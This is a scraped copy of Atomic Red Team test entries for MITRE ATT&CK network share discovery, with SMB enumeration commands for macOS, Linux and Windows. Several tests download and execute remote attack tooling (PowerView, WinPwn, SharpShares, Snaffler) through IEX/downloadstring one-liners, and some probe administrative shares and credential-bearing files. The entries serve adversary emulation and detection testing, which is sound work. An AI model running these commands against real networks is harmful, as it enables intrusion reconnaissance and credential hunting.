Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. File sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder) [Net](https://attack.mitre.org/software/S0039) can be used to query a remote system for available shared drives using thenet view \\\\remotesystemcommand. It can also be used to query shared drives on the local system usingnet share. For macOS, thesharing -lcommand lists all shared points used for smb services.
Atomic Test #11 - Enumerate All Network Shares with SharpShares
Atomic Test #12 - Enumerate All Network Shares with Snaffler
Network Share Discovery
Supported Platforms: macOS
auto_generated_guid: f94b5ad9-911c-4eff-9718-fd21899db4f7
| Name | Description | Type | Default Value | |——|————-|——|—————| | computer_name | Computer name to find a mount on. | string | computer1|
1
sh
1
2
3
df -aH
smbutil view -g //#{computer_name}
showmount #{computer_name}
Network Share Discovery using smbstatus
Supported Platforms: Linux
auto_generated_guid: 875805bc-9e86-4e87-be86-3a5527315cae
| Name | Description | Type | Default Value | |——|————-|——|—————| | package_checker | Package checking command. Debian - dpkg -s samba | string | (rpm -q samba &>/dev/null) || (dpkg -s samba | grep -q installed)| | package_installer | Package installer command. Debian - apt install samba | string | (which yum && yum -y install epel-release samba)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y samba)|
1
bash
1
sudo smbstatus --shares
1
bash
1
if #{package_checker} > /dev/null; then exit 0; else exit 1; fi
1
sudo #{package_installer}
Network Share Discovery using smbstatus
Supported Platforms: Linux
auto_generated_guid: 77e468a6-3e5c-45a1-9948-c4b5603747cb
| Name | Description | Type | Default Value | |——|————-|——|—————| | package_checker | Package checking command. pkg info -x samba | string | (pkg info -x samba &>/dev/null)| | package_installer | Package installer command. pkg install -y samba413 | string | (which pkg && pkg install -y samba413)|
1
sh
1
smbstatus --shares
1
sh
1
if #{package_checker} > /dev/null; then exit 0; else exit 1; fi
1
#{package_installer}
Network Share Discovery utilizing the command prompt. The computer name variable may need to be modified to point to a different host Upon execution avalaible network shares will be displayed in the powershell session
Supported Platforms: Windows
auto_generated_guid: 20f1097d-81c1-405c-8380-32174d493bbb
| Name | Description | Type | Default Value | |——|————-|——|—————| | computer_name | Computer name to find a mount on. | string | localhost|
1
command_prompt
net view \\#{computer_name}
Network Share Discovery utilizing PowerShell. The computer name variable may need to be modified to point to a different host Upon execution, avalaible network shares will be displayed in the powershell session
Supported Platforms: Windows
auto_generated_guid: 1b0814d1-bb24-402d-9615-1b20c50733fb
1
powershell
1
get-smbshare
View information about all of the resources that are shared on the local computer Upon execution, avalaible share drives will be displayed in the powershell session
Supported Platforms: Windows
auto_generated_guid: ab39a04f-0c93-4540-9ff2-83f862c385ae
1
command_prompt
net share
Enumerate Domain Shares the current user has access. Upon execution, progress info about each share being scanned will be displayed.
Supported Platforms: Windows
auto_generated_guid: b1636f0a-ba82-435c-b699-0d78794d8bfd
1
powershell
1
2
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-DomainShare -CheckShareAccess -Verbose
1
powershell
1
if ((Get-WmiObject -Class Win32_ComputerSystem).PartofDomain) {exit 0} else {exit 1}
1
"Join system to domain"
PowerView is a PowerShell tool to gain network situational awareness on Windows domains. ShareFinder finds (non-standard) shares on machines in the domain.
Supported Platforms: Windows
auto_generated_guid: d07e4cc1-98ae-447e-9d31-36cb430d28c4
| Name | Description | Type | Default Value | |——|————-|——|—————| | parameters | ShareFinder parameter | string | -CheckShareAccess|
1
powershell
1
2
Import-Module "PathToAtomicsFolder\..\ExternalPayloads\PowerView.ps1"
Invoke-ShareFinder #{parameters}
1
powershell
1
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PowerView.ps1") {exit 0} else {exit 1}
1
2
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://raw.githubusercontent.com/darkoperator/Veil-PowerView/8784e33f17ee7543ba2f45e27dc5f08ea3a1b856/PowerView/powerview.ps1" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PowerView.ps1"
Network share enumeration using the shareenumeration function of WinPwn
Supported Platforms: Windows
auto_generated_guid: 987901d1-5b87-4558-a6d9-cffcabc638b8
1
powershell
1
2
3
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
shareenumeration -noninteractive -consoleoutput
Network Share Discovery utilizing the dir command prompt. The computer ip variable may need to be modified to point to a different host ip Upon execution avalaible network shares will be displayed in the commandline session
Supported Platforms: Windows
auto_generated_guid: 13daa2cf-195a-43df-a8bd-7dd5ffb607b5
| Name | Description | Type | Default Value | |——|————-|——|—————| | computer_ip | Computer IP to find a mount on. | string | 127.0.0.1|
1
command_prompt
dir \\#{computer_ip}\c$
dir \\#{computer_ip}\admin$
dir \\#{computer_ip}\IPC$
SharpShares is a command line tool that can be integrated with Cobalt Strike’s execute-assembly module, allowing for the enumeration of network shares. This technique has been utilized by various ransomware groups, including BianLian. Reference
Supported Platforms: Windows
auto_generated_guid: d1fa2a69-b0a2-4e8a-9112-529b00c19a41
| Name | Description | Type | Default Value | |——|————-|——|—————| | output_path | File to output enumeration results to | String | $env:temp\T1135SharpSharesOutput.txt| | sharp_path | Path to the SharpShares executable | String | PathToAtomicsFolder\..\ExternalPayloads\SharpShares.exe|
1
powershell
1
cmd /c '#{sharp_path}' /ldap:all | out-file -filepath "#{output_path}"
1
remove-item "#{output_path}" -force -erroraction silentlycontinue
1
powershell
1
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\SharpShares.exe") {exit 0} else {exit 1}
1
2
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/mitchmoser/SharpShares/releases/download/v2.4/SharpShares.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\SharpShares.exe"
Snaffler is an open-source tool that has been used by various threat groups, including Scattered Spider/Muddled Libra, to enumerate accessible shares and credential-containing files within a domain. Reference
Supported Platforms: Windows
auto_generated_guid: b19d74b7-5e72-450a-8499-82e49e379d1a
| Name | Description | Type | Default Value | |——|————-|——|—————| | output_path | File to output enumeration results to | String | $env:temp\T1135SnafflerOutput.txt| | snaffler_path | Path to the Snaffler executable | String | PathToAtomicsFolder\..\ExternalPayloads\Snaffler.exe|
1
powershell
1
invoke-expression 'cmd /c start powershell -command { cmd /c "#{snaffler_path}" -a -o "#{output_path}" }; start-sleep 90; stop-process -name "snaffler"'
1
remove-item "#{output_path}" -force -erroraction silentlycontinue
1
powershell
1
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\Snaffler.exe") {exit 0} else {exit 1}
1
2
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/SnaffCon/Snaffler/releases/download/1.0.150/Snaffler.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Snaffler.exe"